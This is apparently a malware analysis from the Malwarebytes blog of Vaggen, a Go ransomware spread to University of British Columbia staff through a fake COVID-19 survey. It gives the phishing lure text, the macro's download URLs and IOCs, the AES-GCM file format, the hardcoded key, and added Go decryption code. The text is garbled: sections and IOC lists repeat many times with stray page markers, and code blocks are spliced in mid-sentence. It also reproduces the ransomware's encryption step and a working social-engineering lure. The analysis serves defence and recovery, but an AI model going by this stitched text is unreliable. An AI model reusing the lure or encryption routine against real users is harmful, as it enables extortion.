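As an added example (not part of the original post, and not the malware's or Malwarebytes' code), a Go recovery routine for the .VAGGEN file layout described above: nonce || ciphertext || GCM tag under the hardcoded key. It assumes the key string is used raw as the 32-byte AES-256 key and that a .VAGGEN file carries no header beyond the 12-byte nonce, which is what the analysis describes; EncryptLikeVaggen is a reconstruction from that description used only to build test files. Before pointing RecoverDir at real evidence, confirm the layout on one sample and work on a copy.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Key string found in the binary, as reported above; 32 bytes, hence AES-256.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

const (
	vaggenExt = ".VAGGEN"
	nonceSize = 12 // standard GCM nonce, stored in the clear at the start of each file
)

func newGCM() (cipher.AEAD, error) {
	block, err := aes.NewCipher(vaggenKey)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// DecryptVaggen takes one encrypted file laid out as nonce || ciphertext || 16-byte tag
// and returns the plaintext. Open verifies the tag, so a truncated or tampered file,
// or one produced under a different key, fails instead of yielding garbage.
func DecryptVaggen(blob []byte) ([]byte, error) {
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	if len(blob) < nonceSize+gcm.Overhead() {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// EncryptLikeVaggen reproduces the described layout (random nonce, then Seal output)
// so recovery can be exercised on constructed files. It is a reconstruction from the
// analysis, not the malware's code.
func EncryptLikeVaggen(plaintext []byte) ([]byte, error) {
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst; passing nonce as dst yields nonce||ct||tag.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// RecoverDir walks root (as the malware does with filepath.Walk), decrypts every
// *.VAGGEN file and writes the plaintext under the original name. The encrypted
// copy is left in place to preserve evidence; delete it only after verifying the
// output. It returns the number of files recovered and the first error hit.
func RecoverDir(root string) (int, error) {
	recovered := 0
	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
		if err != nil {
			return err
		}
		if info.IsDir() || !strings.HasSuffix(path, vaggenExt) {
			return nil
		}
		blob, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		plain, err := DecryptVaggen(blob)
		if err != nil {
			return fmt.Errorf("%s: %w", path, err)
		}
		if err := os.WriteFile(strings.TrimSuffix(path, vaggenExt), plain, 0o600); err != nil {
			return err
		}
		recovered++
		return nil
	})
	return recovered, err
}

func main() {
	// Throwaway directory with one constructed .VAGGEN file, recovered in place.
	dir, err := os.MkdirTemp("", "vaggen")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	blob, _ := EncryptLikeVaggen([]byte("constructed sample content"))
	os.WriteFile(filepath.Join(dir, "notes.txt"+vaggenExt), blob, 0o600)
	n, err := RecoverDir(dir)
	fmt.Println("recovered:", n, "err:", err)
}
```

The tag check is what makes this safe to run unattended: if the assumed layout or key is wrong for a given sample, Open returns an error and nothing is written, rather than filling the victim's directory with plausible-looking junk.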
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1454 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1455 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1456 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1457 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1458 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1459 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1460 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1461 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1462 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1463 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1464 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1465 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the shell function to execute killar.exe\r\nChecks the return value of the shell function to see whether it succeeded (the return value is the task ID of the\r\nexecuted application)\r\nIf successful, it sends a GET HTTP request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET HTTP request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Go function\r\npath/filepath.Walk.\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\n
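The .VAGGEN layout (12-byte nonce, ciphertext, 16-byte GCM tag) and the hardcoded 32-byte key described above are all a recovery tool needs. The following is an added example, not code from the original post or from the malware: it assumes the key string is used directly as the raw AES-256 key with no derivation, that files are written exactly as gcm.Seal(nonce, nonce, plaintext, nil) produces them, and the function names (openVaggen, sealVaggen, originalName, recoverFile) are my own.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"os"
	"strings"
)

// Key string reported in the analysis: 32 bytes, hence AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12        // GCM nonce the sample draws from CryptGenRandom
	tagSize   = 16        // GCM tag appended after the ciphertext
	vaggenExt = ".VAGGEN" // extension appended to every encrypted file
)

// newGCM builds the AES-256-GCM AEAD for a 32-byte key.
func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("key is %d bytes, AES-256 needs 32", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// openVaggen parses nonce || ciphertext || tag (the .VAGGEN layout) and returns
// the plaintext. It fails closed on a short blob or a bad tag, so a corrupted
// file is never "recovered" into garbage.
func openVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, fmt.Errorf("blob of %d bytes cannot hold a nonce and a GCM tag", len(blob))
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	// Open checks the trailing 16-byte tag before releasing any plaintext.
	return gcm.Open(nil, blob[:nonceSize], blob[nonceSize:], nil)
}

// sealVaggen only builds a sample blob in memory for the demo and test, using the
// gcm.Seal(nonce, nonce, plaintext, nil) pattern that yields nonce || ct || tag.
func sealVaggen(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// originalName maps "report.docx.VAGGEN" back to "report.docx".
func originalName(path string) (string, bool) {
	if !strings.HasSuffix(path, vaggenExt) || len(path) == len(vaggenExt) {
		return "", false
	}
	return strings.TrimSuffix(path, vaggenExt), true
}

// recoverFile decrypts one .VAGGEN file beside itself and returns the restored
// path; the encrypted copy is left in place as evidence.
func recoverFile(path string) (string, error) {
	out, ok := originalName(path)
	if !ok {
		return "", fmt.Errorf("%q lacks the %s extension", path, vaggenExt)
	}
	blob, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	plain, err := openVaggen([]byte(vaggenKey), blob)
	if err != nil {
		return "", fmt.Errorf("%s: %w", path, err)
	}
	if err := os.WriteFile(out, plain, 0o600); err != nil {
		return "", err
	}
	return out, nil
}

func main() {
	key := []byte(vaggenKey) // constructed sample content, sealed and reopened in memory
	blob, _ := sealVaggen(key, []byte("constructed sample document content"))
	plain, err := openVaggen(key, blob)
	fmt.Printf("recovered %q, err=%v\n", plain, err)
	blob[nonceSize] ^= 0x01 // flip a ciphertext byte: GCM must now reject it
	_, err = openVaggen(key, blob)
	fmt.Println("tampered blob rejected:", err != nil)
}
```

Because GCM authenticates before decrypting, a file whose tag does not verify is left untouched rather than overwritten with garbage, which is the behaviour you want from a recovery tool run over a whole share.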
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1490 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1491 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1492 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1493 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1494 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
